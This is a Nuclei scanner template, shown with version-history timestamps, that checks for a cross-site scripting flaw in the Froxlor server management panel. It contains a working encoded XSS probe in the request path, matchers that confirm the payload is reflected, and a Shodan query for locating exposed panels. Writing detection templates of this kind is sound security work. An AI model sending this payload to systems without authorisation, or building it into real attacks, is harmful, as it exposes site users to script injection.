nuclei-templates/vulnerabilities/froxlor-xss.yaml

36 lines
795 B
YAML
Raw Normal View History

2023-01-18 07:18:27 +00:00
id: froxlor-xss
2023-01-17 17:16:26 +00:00
info:
2023-01-18 07:18:27 +00:00
name: Froxlor Server Management - Cross Site Scripting
2023-01-17 17:16:26 +00:00
author: tess
severity: medium
2023-01-18 07:18:27 +00:00
description: |
The user must click the forgot password link in order to execute this XSS.
2023-01-17 17:16:26 +00:00
metadata:
verified: true
shodan-query: title:"Froxlor Server Management Panel"
2023-01-17 17:16:26 +00:00
tags: froxlor,xss
requests:
- method: GET
path:
2023-01-17 19:34:20 +00:00
- '{{BaseURL}}/index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b'
2023-01-17 17:16:26 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "javascript:alert(document.domain);dd//"
- "Froxlor"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200